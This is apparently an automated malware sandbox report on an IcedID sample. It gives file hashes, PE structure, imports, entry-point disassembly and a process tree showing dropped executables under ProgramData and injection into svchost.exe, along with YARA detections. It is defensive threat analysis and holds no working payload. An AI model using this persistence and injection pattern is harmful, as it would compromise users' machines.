SHA-256:	649496A573F16A9F2E1142C2303570E3E1DD76F7B10F73BB7B5FF621D173718D
SHA-512:	BECAA0D6C1ED6B1EAB9A091C8AA9B2BF8B0DF64777DF1D22E5BAD8D248EC6FA56AA1853B06567113E9891AFA30E9A59ED6D133E6EAB7DB991B899E2D32458E4B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i)...G...G...G..Z...G..Z...G..Z...G..p...G...F...G..p...G..p...G..p...G.Rich..G.................PE..L...=..J.................P...................`....@..................................a.......................................z..P....P...............................a..............................0v..@............`...............................text....O.......P.................. ..`.rdata...#...`...$...T..............@..@.data...........\|...x..............@....rsrc........P......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	498176
Entropy (8bit):	5.669578724623772
Encrypted:	false
SSDEEP:	3072:XgIEnSsfJUNnx3xEbU2X6uNZhu+tjj0YqvHlDUwRq5snio2fWKIulMdtb6n36WkB:oSsfJUneGTn9K43WOJ
MD5:	7D89FA6EE789062519618AB3B4236BEE
SHA1:	2F502014787A4B952E9ADED7EAAC12AC35361EAA
SHA-256:	76BB96A7D3762F97C8923F826BFEE12389506E326179A1BD27C56A6AA7743A5F
SHA-512:	28BBF76D41AF8E97CC335088E31DA331FB3DA023469FDD47D170713D7E0AABD3C47EF3ECED44922E8D8BB27B5622A7CAE2EA0023579FBA6444D305C1F0364BA8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i)...G...G...G..Z...G..Z...G..Z...G..p...G...F...G..p...G..p...G..p...G.Rich..G.................PE..L...=..J.................P...................`....@.................................#........................................z..P....P...............................a..............................0v..@............`...............................text....O.......P.................. ..`.rdata...#...`...$...T..............@..@.data...........\|...x..............@....rsrc........P......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	498176
Entropy (8bit):	5.6697951572286795
Encrypted:	false
SSDEEP:	3072:UgIEnSsfJUNnx3xEbU2X6uNZQu+tjj0YqvHlDUwRq5snio2fWKIulMdtb6n36WkB:RSsfJUnejTn9K43WOJ
MD5:	D94EEE493DE5FB08F29D5292973CFFB8
SHA1:	1FF9996BCB8E47EC3E6F708485B24F50DFC7624C
SHA-256:	CDCEA19B6F758935F12225811FB5D01A96EB02612702C81D9A4460D015ECB002
SHA-512:	478CA6FC320C12FE2A6AA439086C17C09DC681D5CC3C94AEF2BBC4764A182072D3021AFB7E06106BB672518365D9CF9FAA660AF416142446346444CB8D6D5EBB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i)...G...G...G..Z...G..Z...G..Z...G..p...G...F...G..p...G..p...G..p...G.Rich..G.................PE..L...=..J.................P...................`....@..........................................................................z..P....P...............................a..............................0v..@............`...............................text....O.......P.................. ..`.rdata...#...`...$...T..............@..@.data...........\|...x..............@....rsrc........P......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	498176
Entropy (8bit):	5.669898426904917
Encrypted:	false
SSDEEP:	3072:KgIEnSsfJUNnx3xEbU2X6uNZgu+tjj0YqvHlDUwRq5snio2fWKIulMdtb6n36WkB:zSsfJUneXTn9K43WOJ
MD5:	48FB41F7CF7787A43B1A90782E9F6DE2
SHA1:	9052326005781E17E7C76E03C0F81E3688F17427
SHA-256:	6155E96CDD7401BD544E0F7F1ED814EF3C4621B9CF30F4E47C558C5A5DE58854
SHA-512:	019B97C1CA6F19BAF2F0BF98736FFA784117E3B901BFADEE9A9AB1ACBC879E1F22A1EA08BD9CCB090F99274FC3C8896C9193B92ACE22C5B041EA916BB63DA1DF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i)...G...G...G..Z...G..Z...G..Z...G..p...G...F...G..p...G..p...G..p...G.Rich..G.................PE..L...=..J.................P...................`....@.................................Q........................................z..P....P...............................a..............................0v..@............`...............................text....O.......P.................. ..`.rdata...#...`...$...T..............@..@.data...........\|...x..............@....rsrc........P......................@..@........................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.66911259116526
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	GziaFibS0d.exe
File size:	498'176 bytes
MD5:	dcddc1610068a8485efe1dfaee14100e
SHA1:	57f4554865be404ccd1be88cc1b8166895bc9355
SHA256:	2673588603fc2203117206d4a318eb7aa20bd88c94342f27cb9207e56216c186
SHA512:	e87300e71947ca269069b6361861a88e2f6f6794d213232d5096335927c2cf7e43e7e8aef283ee9a7957cccc02d1d5391ac69e359e457348778015e754c1e6f0
SSDEEP:	3072:hgIEnSsfJUNnx3xEbU2X6uNZru+tjj0YqvHlDUwRq5snio2fWKIulMdtb6n36WkB:uSsfJUneUTn9K43WOJ
TLSH:	D8B4D5D43005864FF758CCBE5ADCE198F168DD724BA701A2E73C2D76C678C1EAD8A624
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i)...G...G...G..Z....G..Z....G..Z....G..p....G...F...G..p....G..p....G..p....G.Rich..G.................PE..L...=..J...........

File Icon


Icon Hash:	176170e060713f97

Static PE Info

General

Entrypoint:	0x4018bd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4AFFE33D [Sun Nov 15 11:17:17 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	06f8200dd7f647ff019f9eff071391b9

Entrypoint Preview

Instruction
call 00007F715CEE85BDh
jmp 00007F715CEE4F2Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00420BD8h], eax
mov dword ptr [00420BD4h], ecx
mov dword ptr [00420BD0h], edx
mov dword ptr [00420BCCh], ebx
mov dword ptr [00420BC8h], esi
mov dword ptr [00420BC4h], edi
mov word ptr [00420BF0h], ss
mov word ptr [00420BE4h], cs
mov word ptr [00420BC0h], ds
mov word ptr [00420BBCh], es
mov word ptr [00420BB8h], fs
mov word ptr [00420BB4h], gs
pushfd
pop dword ptr [00420BE8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00420BDCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00420BE0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00420BECh], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00420B28h], 00010001h
mov eax, dword ptr [00420BE0h]
mov dword ptr [00420ADCh], eax
mov dword ptr [00420AD0h], C0000409h
mov dword ptr [00420AD4h], 00000001h
mov eax, dword ptr [00419004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00419008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [00000090h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2008 SP1 build 30729
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17aac	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x35000	0x5a518	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x161c0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x17630	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x16000	0x180	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14fc2	0x15000	False	0.7463262648809523	data	6.863283110833074	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x16000	0x232e	0x2400	False	0.3929036458333333	data	5.627495351963688	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x1b7e0	0x7c00	False	0.7430380544354839	data	5.883631944186076	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x35000	0x5a518	0x5a600	False	0.15684971473029047	data	5.075623451054894	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x364e0	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	English	United States	0.09655442790780247
RT_ICON	0x78508	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.28844334664704646
RT_ICON	0x819b0	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.3159426987060998
RT_ICON	0x86e38	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.28613604156825695
RT_ICON	0x8b060	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4199170124481328
RT_ICON	0x8d608	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.46646341463414637
RT_ICON	0x8e6b0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6094262295081967
RT_ICON	0x8f038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6941489361702128
RT_DIALOG	0x357b8	0x110	data	English	United States	0.6029411764705882
RT_DIALOG	0x358c8	0xcc	data	English	United States	0.6666666666666666
RT_DIALOG	0x35998	0xf4	data	English	United States	0.5983606557377049
RT_DIALOG	0x35a90	0xf8	data	English	United States	0.5766129032258065
RT_DIALOG	0x35b88	0x100	data	English	United States	0.61328125
RT_DIALOG	0x35c88	0xd0	data	English	United States	0.5961538461538461
RT_DIALOG	0x35d58	0x12a	data	English	United States	0.587248322147651
RT_DIALOG	0x35e88	0x11c	data	English	United States	0.5845070422535211
RT_DIALOG	0x35fa8	0xbc	data	English	United States	0.6595744680851063
RT_DIALOG	0x36068	0xca	data	English	United States	0.6237623762376238
RT_DIALOG	0x36138	0x134	data	English	United States	0.577922077922078
RT_DIALOG	0x36270	0xec	data	English	United States	0.6313559322033898
RT_GROUP_ICON	0x8f4a0	0x76	data	English	United States	0.7457627118644068
RT_VERSION	0x354e0	0x2d8	data	English	United States	0.4793956043956044
RT_MANIFEST	0x36360	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
KERNEL32.dll	CreateProcessA, FlushFileBuffers, GetProcAddress, SetFileAttributesA, LocalAlloc, GetModuleFileNameA, GetModuleHandleA, LoadLibraryExA, DeleteCriticalSection, GetCurrentThreadId, CloseHandle, LocalFree, Sleep, SetStdHandle, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, GetStringTypeW, GetStringTypeA, LCMapStringW, GetWindowsDirectoryA, SetFilePointer, GetFileSize, CreateFileA, HeapAlloc, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, GetModuleHandleW, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, GetFileType, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetLastError, GetEnvironmentStringsW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, LCMapStringA, MultiByteToWideChar
USER32.dll	SetCursor, GetMessageA, GetDlgItemInt, InsertMenuItemA, RegisterClassExA, GetClassInfoExA, GetFocus, SetFocus, GetWindowTextLengthA, GetScrollRange, SetDlgItemInt, GetCursorPos, AppendMenuA, CallWindowProcA
GDI32.dll	ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetWindowExtEx

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

⊘No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: GziaFibS0d.exePID: 7020, Parent PID: 4376

General

Target ID:	0
Start time:	11:08:56
Start date:	29/09/2023
Path:	C:\Users\user\Desktop\GziaFibS0d.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\GziaFibS0d.exe
Imagebase:	0x400000
File size:	498'176 bytes
MD5 hash:	DCDDC1610068A8485EFE1DFAEE14100E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000000.00000002.1024729856.000000000067D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000000.00000002.1024729856.000000000067D000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000000.00000003.1022438413.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000000.00000003.1022438413.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000000.00000002.1024729856.000000000069B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000000.00000002.1024729856.000000000069B000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6232, Parent PID: 7020

General

Target ID:	3
Start time:	11:09:16
Start date:	29/09/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0x210000
File size:	47'016 bytes
MD5 hash:	B7C999040D80E5BF87886D70D992C51E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Author: kevoreilly
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: rencz.exePID: 6540, Parent PID: 1088

General

Target ID:	4
Start time:	11:09:18
Start date:	29/09/2023
Path:	C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe
Imagebase:	0x400000
File size:	498'176 bytes
MD5 hash:	7D89FA6EE789062519618AB3B4236BEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000004.00000003.1250459151.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000004.00000003.1250459151.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000004.00000002.1251555372.000000000079A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000004.00000002.1251555372.000000000079A000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000004.00000002.1251555372.000000000077D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000004.00000002.1251555372.000000000077D000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6860, Parent PID: 6540

General

Target ID:	5
Start time:	11:09:39
Start date:	29/09/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0x210000
File size:	47'016 bytes
MD5 hash:	B7C999040D80E5BF87886D70D992C51E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Author: kevoreilly
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: tsuvgo.exePID: 2436, Parent PID: 1088

General

Target ID:	6
Start time:	11:09:40
Start date:	29/09/2023
Path:	C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe
Imagebase:	0x400000
File size:	498'176 bytes
MD5 hash:	D94EEE493DE5FB08F29D5292973CFFB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000006.00000003.1477441952.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000006.00000003.1477441952.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000006.00000002.1478560194.000000000073A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000006.00000002.1478560194.000000000073A000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000006.00000002.1478560194.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000006.00000002.1478560194.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5944, Parent PID: 2436

General

Target ID:	15
Start time:	11:10:02
Start date:	29/09/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0x210000
File size:	47'016 bytes
MD5 hash:	B7C999040D80E5BF87886D70D992C51E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Author: kevoreilly
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: zipdk.exePID: 1076, Parent PID: 1088

General

Target ID:	16
Start time:	11:10:03
Start date:	29/09/2023
Path:	C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe
Imagebase:	0x400000
File size:	498'176 bytes
MD5 hash:	48FB41F7CF7787A43B1A90782E9F6DE2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000010.00000002.1725192605.000000000058A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000010.00000002.1725192605.000000000058A000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000010.00000002.1725192605.000000000056D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000010.00000002.1725192605.000000000056D000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000010.00000003.1723691324.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000010.00000003.1723691324.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6344, Parent PID: 1076

General

Target ID:	17
Start time:	11:10:26
Start date:	29/09/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0x210000
File size:	47'016 bytes
MD5 hash:	B7C999040D80E5BF87886D70D992C51E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Author: kevoreilly
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: tfykdkdkdk.exePID: 6408, Parent PID: 1088

General

Target ID:	18
Start time:	11:10:28
Start date:	29/09/2023
Path:	C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe
Imagebase:	0x400000
File size:	498'176 bytes
MD5 hash:	2A114987A9C3FE717FD6DF2A44C89F1F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000012.00000003.1951491009.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000012.00000003.1951491009.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000012.00000002.1953599695.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000012.00000002.1953599695.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000012.00000002.1953599695.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000012.00000002.1953599695.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 3320, Parent PID: 6408

General

Target ID:	19
Start time:	11:10:49
Start date:	29/09/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0x210000
File size:	47'016 bytes
MD5 hash:	B7C999040D80E5BF87886D70D992C51E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Author: kevoreilly
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: ayxuiczvtsui.exePID: 6740, Parent PID: 1088

General

Target ID:	20
Start time:	11:10:51
Start date:	29/09/2023
Path:	C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe
Imagebase:	0x400000
File size:	498'176 bytes
MD5 hash:	38B4A6BB5079BAF60A6BC01BFB016449
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
